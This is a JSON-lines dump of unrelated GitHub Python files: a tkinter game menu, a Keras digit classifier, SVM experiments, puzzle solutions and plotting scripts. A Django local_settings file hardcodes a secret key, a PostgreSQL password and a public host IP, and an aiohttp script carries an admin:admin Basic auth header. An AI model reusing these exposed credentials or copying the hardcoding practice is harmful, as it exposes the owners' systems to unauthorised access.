x=1400,\n y=480,\n width=176,\n height=176,\n img_file=picture_parent_directory+\"b_death_star.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n Sprite(\n x=10,\n y=230,\n img_file=picture_parent_directory+\"1_title_image.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n PlayButton(\n x=window_width*0.5,\n y=480,\n width=228,\n height=100,\n img_file=picture_parent_directory+\"m_play.png\",\n parent_frame=main_menu,\n anchor=tk.CENTER\n )\n)\nmy_objects.append(\n SettingsButton(\n x=715,\n y=600,\n width=169,\n height=50,\n img_file=picture_parent_directory+\"m_settings.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n ExitButton(\n x=750,\n y=680,\n width=100,\n height=50,\n 
img_file=picture_parent_directory+\"m_exit.png\",\n parent_frame=main_menu\n )\n)\n\n# reverse order of objects,\n# so that ones which are on top have higher interaction priority\nmy_objects.reverse()\n\nregular_font = tkfont.Font(family='Noto Sans Display', size=16)\n\n\n# main functional\ndef load_settings():\n ''' Loads settings '''\n global user_settings\n\n open(settings_file_name, \"a+\")\n try:\n user_settings = json.load(open(settings_file_name))\n except:\n pass\n\ndef save_settings():\n ''' Saves settings '''\n global user_settings\n\n # create file if not found\n open(settings_file_name, \"a+\")\n\n json.dump(user_settings, open(settings_file_name, \"w\"))\n\n\ndef change_frame(this_frame, next_frame):\n ''' Changes frame '''\n this_frame.pack_forget()\n next_frame.pack(fill=tk.BOTH, expand=1)\n root.update()\n\ndef press_button_main_menu(event):\n ''' Detects if user clicked on sprite in main menu '''\n for obj in my_objects:\n if obj.x < event.x < obj.x + obj.width\\\n and obj.y < event.y < obj.y + obj.height:\n print(\"e\")\n obj.on_click(obj.x - event.x,obj.y - event.y)\n\ndef drag_sprite(event):\n ''' Moves movable sprite while mouse clicked and moving '''\n for obj in my_objects:\n if isinstance(obj, DragableSprite):\n if obj is current_drag_sprite:\n obj.move(\n event.x + obj.drag_point[\"x\"] - obj.x,\n event.y + obj.drag_point[\"y\"] - obj.y\n )\n print(obj.last_movement_x, obj.last_movement_y)\n\ndef release_sprite(event): # noqa , parameter event needed for callback signature\n ''' Stops current movable sprite from moving when unclicked'''\n global current_drag_sprite\n\n current_drag_sprite = None\n\ndef flip_sound_setting():\n ''' Turns sound off if it`s turned on,\n and turns sound on if it`s turned off '''\n global user_settings\n\n user_settings[\"sound\"] = not user_settings[\"sound\"]\n\n on_label = tk.Label(\n master=settings_frame,\n text='ON',\n font=regular_font,\n fg='white',\n bg='green'\n )\n off_label = tk.Label(\n master=settings_frame,\n text='OFF',\n font=regular_font,\n fg='black',\n bg='red'\n )\n\n sound_label = on_label if user_settings[\"sound\"] else off_label\n\n sound_label.place(\n relx=0.5,\n rely=0.17,\n width=window_width*0.07,\n height=window_height*0.07,\n anchor=tk.CENTER\n )\n\n save_settings()\n\ndef on_key_press(event):\n ''' Reasignes control key of a selected action '''\n global state, states_label\n\n if state != \"\":\n states_label[state].configure(text=event.keysym)\n user_settings[state] = event.keysym\n state = \"\"\n save_settings()\n else:\n return\n\ndef change_state_to(state_parameter):\n ''' Detects which action is changes control key '''\n global state\n\n state = state_parameter\n\ndef add_button_with_label(\n master=settings_frame,\n text=\"?\",\n font=regular_font,\n foreground=\"blue\",\n command=None,\n function_arguments=(),\n relx=0.5,\n rely=0.5,\n button_width=150,\n button_height=50,\n label_width=150,\n label_height=50,\n anchor=tk.CENTER,\n ID=\"unnamed\"\n):\n ''' Adds button and it`s corresponding label '''\n tk.Button(\n master=master,\n text=text,\n font=font,\n fg=foreground,\n command=functools.partial(command, function_arguments)\n ).place(\n relx=relx-button_width/window_width/2,\n rely=rely,\n width=button_width,\n height=button_height,\n anchor=anchor\n )\n states_label[ID]=tk.Label(\n master=master,\n text=user_settings[ID],\n font=font,\n fg=foreground,\n )\n states_label[ID].place(\n relx=relx*1.01+button_width/window_width/2,\n rely=rely*1.01,\n width=label_width,\n height=label_height,\n 
anchor=anchor\n    )\n\ndef restart_fps_timer():\n    ''' Resets the variables associated with fps waiting '''\n    global frame_period, TARGET_FPS, now, next_frame_time\n\n    frame_period = 1.0/TARGET_FPS\n    now = time()\n    next_frame_time = now + frame_period\n\ndef animate_background():\n    ''' Animates stars and planets on the background '''\n    global b_background_instance, b_background_instance_next,\\\n        frames_lapsed, frame_period, TARGET_FPS, now, next_frame_time\n\n    now = time()\n    while now < next_frame_time:\n        sleep(next_frame_time - now)\n        now = time()\n\n    next_frame_time = now + frame_period\n\n    frames_lapsed += 1\n\n    main_menu.move(b_background_instance, -1, 0)\n    main_menu.move(b_background_instance_next, -1, 0)\n\n    if frames_lapsed >= 1300:\n        # kinda reset\n        main_menu.delete(b_background_instance)\n        b_background_instance = b_background_instance_next\n        b_background_instance_next = main_menu.create_image(\n            1300,\n            0,\n            image=b_background,\n            anchor=tk.NW\n        )\n        main_menu.lower(b_background_instance_next)\n        frames_lapsed = 0\n    # inertia implementation\n    for obj in my_objects:\n        if obj is not current_drag_sprite:\n            obj.move(obj.last_movement_x, obj.last_movement_y)\n    root.update()\n\n# make some preparations\nload_settings()\nflip_sound_setting()\nflip_sound_setting()\n\n# set up settings UI\ntk.Button(\n    master=settings_frame,\n    text='Sound',\n    font=regular_font,\n    fg='blue',\n    command=flip_sound_setting\n).place(\n    relx=0.5,\n    rely=0.1,\n    width=window_width*0.2,\n    height=window_height*0.07,\n    anchor=tk.CENTER\n)\n\ntk.Button(\n    master=settings_frame,\n    text='Return to main menu',\n    font=regular_font,\n    fg='blue',\n    command=lambda:change_frame(settings_frame, main_menu)\n).place(\n    relx=0.5,\n    rely=0.8,\n    width=window_width*0.2,\n    height=window_height*0.07,\n    anchor=tk.CENTER\n)\n\ncontrol_button_relx = 0.5\ncontrol_button_rely = 0.3\ndelta_rely = 0.07\nfor key in user_settings:\n    if key == 'sound':\n        continue\n\n    add_button_with_label(\n        text=key,\n        command=change_state_to,\n        function_arguments=(key),\n        relx=control_button_relx,\n        rely=control_button_rely,\n        button_width=window_width*0.1,\n        button_height=window_height*delta_rely*0.9,\n        label_width=window_width*0.1,\n        label_height=window_height*delta_rely*0.9,\n        ID=key\n    )\n    control_button_rely += delta_rely\n\nroot.bind(\"<Key>\", on_key_press)\nmain_menu.bind(\"<Button-1>\", press_button_main_menu)\nmain_menu.bind(\"<B1-Motion>\", drag_sprite)\nmain_menu.bind(\"<ButtonRelease-1>\", release_sprite)\n\n\nwhile game_not_started:\n    startTime = time()\n    animate_background()\n    endTime = time()\n    elapsedTime = endTime - startTime\n    print(1./elapsedTime)\n","repo_name":"Nocommas555/TurtlePatformer","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":11731,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} {"seq_id":"71951720489","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 14 06:48:04 2020\r\n\r\n@author: jayar\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.utils.np_utils import to_categorical\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Flatten, Dropout\r\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\r\nfrom keras.optimizers import Adam\r\nimport pickle\r\nimport os\r\n\r\nimages_path = os.getcwd()+r'\\myData'\r\nclasses = len(range(0,10,1))\r\nimages = []\r\nclassNbr = []\r\nnbrClasses = 
list(range(0,10,1))\r\n\r\n# import images and corresponding classes\r\nfor i in nbrClasses:\r\n pics_list = os.listdir(images_path+f'\\{i}')\r\n for pic in pics_list:\r\n img = cv2.imread(images_path+f'\\{i}'+f'\\{str(pic)}')\r\n img = cv2.resize(img, (64,64))\r\n images.append(img)\r\n classNbr.append(i)\r\ncv2.imshow('simple image', images[45])\r\ncv2.waitKey(0)\r\nprint(len(images), len(classNbr))\r\n\r\nimages = np.array(images)\r\nclassNbr = np.array(classNbr)\r\nprint(images.shape, classNbr.shape)\r\n\r\nfor x in range(10):\r\n print(f\"class {x} has {len(np.where(classNbr==x)[0])}\")\r\n \r\n# Image processing to gray scale, blur, equalize histogram to increase intensity and normalize the array\r\ndef preprocessing(img):\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n img = cv2.GaussianBlur(img,(5,5),cv2.BORDER_DEFAULT)\r\n img = cv2.equalizeHist(img)\r\n img = img/255\r\n return img\r\n\r\nX_train,X_test,y_train,y_test = train_test_split(images,classNbr,test_size=0.2)\r\nX_train,X_validation,y_train,y_validation = train_test_split(X_train,y_train,test_size=0.2)\r\nprint(X_train.shape)\r\nprint(X_test.shape)\r\nprint(X_validation.shape)\r\nfor x in range(10):\r\n print(f\"class {x} has {len(np.where(y_validation==x)[0])}\")\r\n \r\n \r\n# expanding the image array to include one channel for keras training\r\nX_train = np.array(list(map(preprocessing, X_train))).reshape((X_train.shape[0],X_train.shape[1],X_train.shape[2],1))\r\nX_test = np.array(list(map(preprocessing, X_test))).reshape((X_test.shape[0],X_test.shape[1],X_test.shape[2],1))\r\nX_validation = np.array(list(map(preprocessing, X_validation))).reshape((X_validation.shape[0],X_validation.shape[1],X_validation.shape[2],1))\r\n\r\n\r\n\"\"\"\r\nImage Augmentation using keras for generating images with different params (horizontal and vertical flips were avoided)\r\none hot encoding of y classes\r\n\"\"\" \r\n\r\nimage_gen = ImageDataGenerator(width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n brightness_range=(1,2),\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n rotation_range=10)\r\n\r\nimage_gen.fit(X_train)\r\ny_train = to_categorical(y_train, classes)\r\ny_test = to_categorical(y_test, classes)\r\ny_validation = to_categorical(y_validation, classes)\r\n\r\n\r\n# CNN model Lenet model\r\ndef lenet_model():\r\n model = Sequential()\r\n model.add((Conv2D(60,(5,5),input_shape=(64,64,1),activation='relu')))\r\n model.add((Conv2D(60, (5,5), activation='relu')))\r\n model.add(MaxPooling2D((2,2)))\r\n model.add((Conv2D(30, (3,3), activation='relu')))\r\n model.add((Conv2D(30, (3,3), activation='relu')))\r\n model.add(MaxPooling2D((2,2)))\r\n model.add(Dropout(0.5))\r\n model.add(Flatten())\r\n model.add(Dense(500,activation='relu'))\r\n model.add(Dropout(0.5))\r\n model.add(Dense(classes, activation='softmax'))\r\n model.compile(Adam(lr=0.001),loss='categorical_crossentropy',metrics=['accuracy'])\r\n return model\r\nmodel = lenet_model()\r\n\r\nprint(model.summary())\r\n\r\ntraining = model.fit_generator(image_gen.flow(X_train, y_train, batch_size=50),\r\n steps_per_epoch=2000,\r\n epochs=20,\r\n validation_data=(X_validation,y_validation), \r\n shuffle=1)\r\n\r\npickle_model = open('model.p', 'wb+')\r\npickle.dump(model, pickle_model)\r\npickle_model.close()\r\n\r\n\r\nfig, ax = plt.subplots(nrows=1, ncols=2, figsize=(8,5)) \r\nax[0].plot(training.history['loss'])\r\nax[0].plot(training.history['val_loss'])\r\nax[0].legend(['training', 
'validation'])\r\nax[0].set_title('Loss')\r\nax[0].set_xlabel('epochs')\r\nax[1].plot(training.history['accuracy'])\r\nax[1].plot(training.history['val_accuracy'])\r\nax[1].legend(['training', 'validation'])\r\nax[1].set_title('Accuracy')\r\nax[1].set_xlabel('epochs')\r\nfig.tight_layout()\r\n\r\n\r\ntest_score = model.evaluate(X_test,y_test,verbose=1)\r\nprint(f'Test loss: {test_score[0]} and Test accuracy: {test_score[1]}')","repo_name":"jayaram87/DIGIT_CNN_LENET_CLASSFIER","sub_path":"lenet_cnn_model.py","file_name":"lenet_cnn_model.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"23079485736","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time    : 2017/8/8 8:19 AM\n# @Author  : Hou Rong\n# @Site    :\n# @File    : mongo_task.py\n# @Software: PyCharm\nfrom data_source import MysqlSource\nfrom my_logger import get_logger\nfrom MongoTask.MongoTaskInsert import InsertTask\nfrom service_platform_conn_pool import fetchall, spider_base_tmp_wanle_pool, spider_base_tmp_wanle_test_pool\n\nlogger = get_logger(\"insert_mongo_task\")\n\n\n# def get_tasks():\n#     f = open('/tmp/img_list(7).csv')\n#     for line in f:\n#         sid, _, url = line.strip().split(',')\n#         yield sid, url\ndef get_tasks():\n    sql = '''SELECT sid, url FROM img_list;'''\n    for line in fetchall(spider_base_tmp_wanle_pool, sql, is_dict=True):\n        yield line['sid'], line['url']\n    sql = '''SELECT sid, url FROM img_list;'''\n    for line in fetchall(spider_base_tmp_wanle_test_pool, sql, is_dict=True):\n        yield line['sid'], line['url']\n\n\ndef insert_task():\n    with InsertTask(worker='proj.total_tasks.images_task', queue='file_downloader', routine_key='file_downloader',\n                    task_name='image_wanle_huantaoyou', source='huantaoyou', _type='FileDownloader',\n                    priority=11) as it:\n        for sid, url in get_tasks():\n            args = {\n                'source': \"huantaoyou\",\n                'source_id': sid,\n                'target_url': url,\n                'bucket_name': 'mioji-wanle',\n                'file_prefix': 'huantaoyou',\n                'is_poi_task': True,\n                'need_insert_db': True,\n            }\n            it.insert_task(args)\n\n\nif __name__ == '__main__':\n    insert_task()\n","repo_name":"20113261/p_m","sub_path":"MongoTask/test_huantaoyou_img_task.py","file_name":"test_huantaoyou_img_task.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"28087652464","text":"# Implement a generator function that takes an iterator of arbitrary objects and yields them without repetitions.\n# The original order of the objects must be preserved.\n\n\ndef distinct(iterable):\n    used = set()\n    for item in iterable:\n        if item not in used:\n            used.add(item)\n            yield item\n\n","repo_name":"NitroLine/python-task-help","sub_path":"21-30/26_distinct.py","file_name":"26_distinct.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} {"seq_id":"19983403337","text":"import math\r\nfrom collections import Counter\r\n\r\n\r\nclass StatsCounter(Counter):\r\n    @property\r\n    def mean(self) -> float:\r\n        sum0 = sum(v for k, v in self.items())\r\n        sum1 = sum(k * v for k, v in self.items())\r\n        return sum1 / sum0\r\n\r\n    @property\r\n    def stdev(self) -> float:\r\n        sum0 = sum(v for k, v in self.items())\r\n        sum1 = sum(k * v for k, v in self.items())\r\n        sum2 = sum(k * k * v for k, v in self.items())\r\n        return math.sqrt(\r\n            sum0 * sum2 - sum1 * sum1\r\n        ) / 
sum0\r\n","repo_name":"DavidGugea/Mastering-Object-Oriented-Python-Programming","sub_path":"Section1/Chapter7/StatsCounterMapping.py","file_name":"StatsCounterMapping.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72992198249","text":"import numpy as np\nimport wave as wave\nimport sounddevice as sd\n\nsample_wave_file = \"wgn_wave.wav\"\nwav = wave.open(sample_wave_file)\ndata = wav.readframes(wav.getnframes())\ndata = np.frombuffer(data, dtype=np.int16)\n\nsd.play(data, wav.getframerate())\n\nprint(\"再生開始\")\n\nstatus = sd.wait()\n\nprint(\"再生停止\")\n","repo_name":"CC-WO/SoundSourceSeparation","sub_path":"src/code2.6.py","file_name":"code2.6.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27185141320","text":"N = int(input())\np = list(map(int,input().split(\" \")))\norder = list(range(1,N+1))\n\ni = 0\nans = 0\n\nwhile i < (N-1):\n\tif p[i] == order[i]:\n\t\tp[i] = -1\n\t\tif p[i+1] == order[i+1]:\n\t\t\tp[i+1] = -1\n\t\t\tans += 1\n\t\t\ti += 1\n\t\telse:\n\t\t\tans += 1\n\n\ti += 1\n\nif p[N-1] == order[N-1]:\n\tans += 1\n\nprint(ans)\n\n","repo_name":"banboooo044/AtCoder","sub_path":"ABC072/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12797270127","text":"from sklearn import datasets\nboston = datasets.load_boston()\nx = boston.data\ny = boston.target\nhalf = int(len(x)/2)\n\nimport regression\nmodel = regression.RidgeRegression(alpha=0.1)\n\n# case 1: learn on the first half, test on the last half\nmodel.fit(x[:half], y[:half])\nscore = model.score(x[half:], y[half:])\n\n# case 2: learn on the last half, test on the first half\nmodel.fit(x[half:], y[half:])\nscore += model.score(x[:half], y[:half])\n\nprint(\"RidgeRegression(alpha=0.1) score =\", score)\n#-> RidgeRegression(alpha=0.1) score = 78656.6246552\n#-> RidgeRegression(alpha=1.0) score = 42334.1689238\n","repo_name":"naltoma/regression-test","sub_path":"crossvalidation.py","file_name":"crossvalidation.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"85282349","text":"__author__ = 'vchang'\n\nfrom celery import Celery\n\nfrom app.routes.controllers import manual_route_poll\n\ncelery = Celery('tasks')\ncelery.config_from_object('app.routes.celeryconfig')\n\n@celery.task\ndef trigger_grab(route_id):\n save_duration(route_id)","repo_name":"nekorevend/routetimetrend","sub_path":"project/RouteTimeTrend/app/routes/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40838169","text":"#Practical Lab Assignment 7.1.2\r\n# Create an array of 1 to 20 in reverse order using arange function.\r\n\r\n#importing numpy library\r\n\r\nimport numpy as np \r\n\r\nn = int(input(\"Enter the size of Array: \"))\r\na = []\r\n\r\nfor i in range(0,n):\r\n a.append(i)\r\n\r\narr = np.array(a)\r\n\r\n#in arange function (n-1) defines starting value, -1 is stopping value which is not included and last one is for difference in 
elements\r\nprint(arr[np.arange(n-1,-1,-1)])","repo_name":"darshanjoshi16/GTU-Python-PDS","sub_path":"lab7_1_2.py","file_name":"lab7_1_2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6696551882","text":"# Load the Python Standard and DesignScript Libraries\nimport sys\nimport clr\nclr.AddReference('ProtoGeometry')\nfrom Autodesk.DesignScript.Geometry import *\nimport System\nfrom System import Array\nfrom System.Collections.Generic import *\n\n# The inputs to this node will be stored as a list in the IN variables.\nFirstList = IN[0]\nSecondList = IN[1]\n\n# Flatten list function\ndef flatten_list(nested_list):\n flat_list = []\n for element in nested_list:\n if isinstance(element, list):\n flat_list.extend(flatten_list(element))\n else:\n flat_list.append(element)\n return flat_list\n\n# Combine the two lists\ncombined_list = FirstList + SecondList\n\n# Use the function with the combined list\nflat_list = flatten_list(combined_list)\n\n# Count the elements in the final list\nelement_count = len(flat_list)\n\n# Assign your output to the OUT variable.\nOUT = element_count\n","repo_name":"PkHeris/Dynamo_python","sub_path":"python scripts/Combine_Flatten_Count_Lists.py","file_name":"Combine_Flatten_Count_Lists.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39183507031","text":"import sys\nimport os\nimport socket\nHOME=os.environ['HOME']\nsys.path.insert(1,HOME+'/github/StreamingSVM')\nfrom operations import LoadLibsvm\nimport numpy as np\nfrom operations import Print\nimport time\n\ndef stats(exp_name='', acc=0, time=0):\n Print.Print.result1(exp_name + \" Streaming Accuracy : \" + str(acc) + \"%\" + \", \" + str(time))\n\n fp = open(\"logs/\" + socket.gethostname() + \"_\" + exp_name + \"_meb_results.txt\", \"a\")\n # fp.write(\"alpha : \" + str(self.alpha) + \", epochs : \" + str(self.epochs) + \", accuracy : \" + str(self.acc) + \"%\" + \", time : \" + str(self.training_time) + \" s\\n\")\n fp.write(str(acc) + \", \" + str(time) + \"\\n\")\n fp.close()\n\nX = np.array([[1,1],[2,1],[3,1],[4,1],[1,5],[2,6],[3,7],[4,5]])\ny = np.array([1,1,1,1,-1,-1,-1,-1])\nX_test = np.array([[1,1.25],[2.1,1.15],[3.1,1.45],[4.23,1.21],[1.3,5.25],[2.11,6.24],[3.3,7.24],[4.212,5.78]])\n#plt.scatter(X[:,0],X[:,1])\n#plt.show()\ndatasets = [ 'ijcnn1', 'heart', 'webspam', 'cod-rna', 'phishing', 'breast_cancer', 'w8a', 'a9a', 'real-slim']\nn_features = [22, 13, 254, 8, 68, 10, 300 , 123, 20958]\nsplits = [False, False, True, False, True, True, False, False, True]\n\nfor dataset, features, split in zip(datasets, n_features, splits):\n\n base_path = ''\n hostname = socket.gethostname()\n\n if hostname == 'vibhatha-ThinkPad-P50':\n base_path = '/home/vibhatha/data/svm/'\n else:\n base_path = '/N/u/vlabeyko/data/svm/svm/'\n\n bulk = False\n dataset = dataset\n training_file = base_path + dataset + '/training.csv'\n testing_file = base_path + dataset + '/testing.csv'\n n_features = features\n split = split\n training_loader = LoadLibsvm.LoadLibSVM(filename=training_file, n_features=n_features)\n\n x_training = []\n y_training = []\n x_testing = []\n y_testing = []\n\n if split == True:\n x_all, y_all = training_loader.load_all_data()\n ratio = 0.8\n size = len(x_all)\n split_index = int(size * ratio)\n x_training = x_all[:split_index]\n x_testing = x_all[split_index:]\n y_training = y_all[:split_index]\n 
y_testing = y_all[split_index:]\n\n else :\n training_loader = LoadLibsvm.LoadLibSVM(filename=training_file, n_features=n_features)\n testing_loader = LoadLibsvm.LoadLibSVM(filename=testing_file, n_features=n_features)\n x_training, y_training = training_loader.load_all_data()\n x_testing, y_testing = testing_loader.load_all_data()\n\n print(x_training.shape)\n X = x_training\n y = y_training\n\n\n M = 1\n R = 0\n e2 = 1\n w = y[0] * X[0]\n C = 1\n exp_time = 0\n exp_time -= time.time()\n for i in range(1,len(X)):\n d = np.sqrt(np.linalg.norm(w-y[i]*X[i]) + e2 + 1/C)\n if d >= R:\n w = w + 0.5 * (1 - R/d) * (y[i] * X[i] - w)\n R = R + 0.5 * (d-R)\n e2 = e2 * (1- (0.5) * (1- (R/d)))**2 + (0.5 * (1 - (R/d)))**2\n M = M + 1\n exp_time += time.time()\n print(\"R : \", R)\n print(\"W : \", w)\n print(\"M : \", M)\n\n #plt.scatter(X[:,0],X[:,1])\n #plt.show()\n\n labels = []\n for x in x_testing:\n label = np.sign(np.dot(w.T, x))\n labels.append(label)\n\n y_pred = np.array(labels)\n #print(labels)\n #print(y_testing)\n correct = (y_pred == y_testing).sum()\n total = len(y_pred)\n acc = float(correct) / float(total) * 100.0\n print(\"Acc : \", acc)\n print(\"Time : \", exp_time)\n stats(exp_name=dataset, acc=acc, time=exp_time)\n\n\n","repo_name":"vibhatha/PSGDSVMPY","sub_path":"meb/MEBLib.py","file_name":"MEBLib.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33595489330","text":"import aiohttp\nimport asyncio\nimport time\n\nimport requests\n\n\n\nheaders = {\n'Accept': \"application/json\",\n'Content-Type': \"application/json\",\n'Authorization': \"Basic YWRtaW46YWRtaW4=\",\n'cache-control': \"no-cache\"\n}\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n for _ in range(10):\n async with session.get('http://python.org') as response:\n\n print(\"Status:\", response.status)\n print(\"Content-type:\", response.headers['content-type'])\n\n html = await response.text()\n print(\"Body:\", html[:100], \"...\")\n\nstart_time = time.time()\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n\nprint(time.time() - start_time)\n\n\n\n\n\n# async with aiohttp.ClientSession(headers=headers) as session:\n# async with session.get(\"http://httpbin.org/headers\") as response:\n# json_body = await response.json()","repo_name":"int-unl/End-to-End-Slicing","sub_path":"transport/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"253054958","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day 14 2020\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nwith open('input.txt', 'r') as f:\n data = f.read().splitlines()\n\nfrom collections import defaultdict as dd\nfrom itertools import product\n\ndef build_instr(data):\n instr = dd(list)\n for el in data:\n if el[:4] == \"mask\": mask = el.split(\" = \")[1]\n elif el[:3] == \"mem\":\n mem = el.split(\"] = \")[0].split(\"[\")[1]\n val = el.split(\" = \")[1]\n instr[mask] += [(int(mem), int(val))]\n return instr\n\ndef build_memory_v1(instr):\n memory = dd(int)\n for k, v in instr.items():\n mask = k\n for calc in v:\n mem, val = calc\n memory[mem] = compute_mask(val, mask)\n return memory\n\ndef compute_mask(val, mask):\n res = \"\"\n mask = \"0b\" + mask\n bin_val = format(val, f'#0{len(mask)}b')\n for i, _ in enumerate(mask):\n if mask[i] == \"X\":\n 
res += bin_val[i]\n continue\n else:\n res += mask[i]\n continue\n return int(res, 2)\n\ndef build_memory_v2(instr):\n memory = dd(int)\n for k, v in instr.items():\n mask = k\n for calc in v:\n mem, val = calc\n mem = mask_mem(mem, mask)\n for addr in mem:\n memory[addr] = val\n return memory\n\ndef mask_mem(mem, mask):\n addrs = []\n res = \"\"\n mask = \"0b\" + mask\n bin_val = format(mem, f'#0{len(mask)}b')\n for i, _ in enumerate(mask):\n if mask[i] == \"X\":\n res += \"f\"\n continue\n elif mask[i] in ['0', 'b']:\n res += bin_val[i]\n continue\n else:\n res += \"1\"\n continue\n return [x for x in scramble(res)]\n\ndef scramble(binary):\n res = []\n float_idx = [i for i, val in enumerate(binary) if val == \"f\"]\n prod_rules = {k:[0,1] for k in float_idx}\n products = [dict(zip(prod_rules, v)) for v in product(*prod_rules.values())]\n for rule in products:\n target = list(binary)\n for k, v in rule.items():\n target[k] = str(v)\n res.append(\"\".join(target))\n return [int(x, 2) for x in res]\n\nset_instr = build_instr(data)\n# pt1\nmem1 = build_memory_v1(set_instr)\nprint(sum([x for x in mem1.values()]))\n# pt2\nmem2 = build_memory_v2(set_instr)\nprint(sum([x for x in mem2.values()]))\n","repo_name":"gmnr/advent-of-code","sub_path":"2020/14/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9176863651","text":"# This file is exec'd from settings.py, so it has access to and can\n# modify all the variables in settings.py.\nimport os\nDEBUG = True\n\n# Make these unique, and don't share it with anybody.\nSECRET_KEY = \"pl(@#n^(g3kb*&4s_ah)^+e(b4q(%6!)1!+49urwedjz1z#dzb\"\nNEVERCACHE_KEY = \"gfl-q+ak#3onuipxt=3am@0e@iz@3^!ks(+rb1sa_n(49$0s=)\"\n\nDATABASES = {\n \"default\": {\n # Ends with \"postgresql_psycopg2\", \"mysql\", \"sqlite3\" or \"oracle\".\n \"ENGINE\": \"django.db.backends.postgresql_psycopg2\",\n # DB name or path to database file if using sqlite3.\n \"NAME\": \"aavin\",\n # Not used with sqlite3.\n \"USER\": \"aavin\",\n # Not used with sqlite3.\n \"PASSWORD\": \"kultivate\",\n # \"PASSWORD\":\"aavinlocall\",\n # \"PASSWORD\":\"aavinlocall\",\n # Set to empty string for localhost. Not used with sqlite3.\n # \"HOST\": \"localhost\",\n # \"HOST\": \"139.59.80.236\",\n \"HOST\":\"65.1.212.193\",\n # Set to empty string for default. 
Not used with sqlite3.\n \"PORT\": \"5432\",\n # \"PORT\": \"165.22.220.62\",\n }\n}\n\n# Allowed development hosts\nALLOWED_HOSTS = [\"localhost\", \"127.0.0.1\", \"::1\", \"*\"]\n\n\n#static & Media \nSTATIC_URL = '/static/'\nMEDIA_URL = STATIC_URL + '/media/' \nDATA_DIR = '/opt/aavin-assets/'\nSTATIC_ROOT = os.path.join(DATA_DIR, STATIC_URL.strip(\"/\"))\nMEDIA_ROOT = os.path.join(DATA_DIR, MEDIA_URL.strip(\"/\"))\n\n###################\n# DEPLOY SETTINGS #\n###################\n\n# These settings are used by the default fabfile.py provided.\n# Check fabfile.py for defaults.\n\n# FABRIC = {\n# \"DEPLOY_TOOL\": \"rsync\", # Deploy with \"git\", \"hg\", or \"rsync\"\n# \"SSH_USER\": \"\", # VPS SSH username\n# \"HOSTS\": [\"\"], # The IP address of your VPS\n# \"DOMAINS\": [\"\"], # Will be used as ALLOWED_HOSTS in production\n# \"REQUIREMENTS_PATH\": \"requirements.txt\", # Project's pip requirements\n# \"LOCALE\": \"en_US.UTF-8\", # Should end with \".UTF-8\"\n# \"DB_PASS\": \"\", # Live database password\n# \"ADMIN_PASS\": \"\", # Live admin user password\n# \"SECRET_KEY\": SECRET_KEY,\n# \"NEVERCACHE_KEY\": NEVERCACHE_KEY,\n# }","repo_name":"ALTHAFACTIVEGIT/aawin","sub_path":"aavin_admin/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8823316994","text":"import matplotlib\nimport matplotlib.pyplot as plt\n#plt.style.use('bmh')\nx_ass_koord=[2015,2016,2017,2018,2019]\ny_ass_koord=[2.50,3.15,3.50,4.05,5.70]\ny_ass_koord2=[7.50,8.00,8.50,8.70,9.00]\nplt.xlabel(\"Gadi\")\nplt.ylabel(\"Cenas Eiro\")\nplt.axis([2014,2020,0,10])\nplt.title(\"Cenu izmaiņas pa gadiem\")\nplt.bar(x_ass_koord,y_ass_koord,label=\"Siera 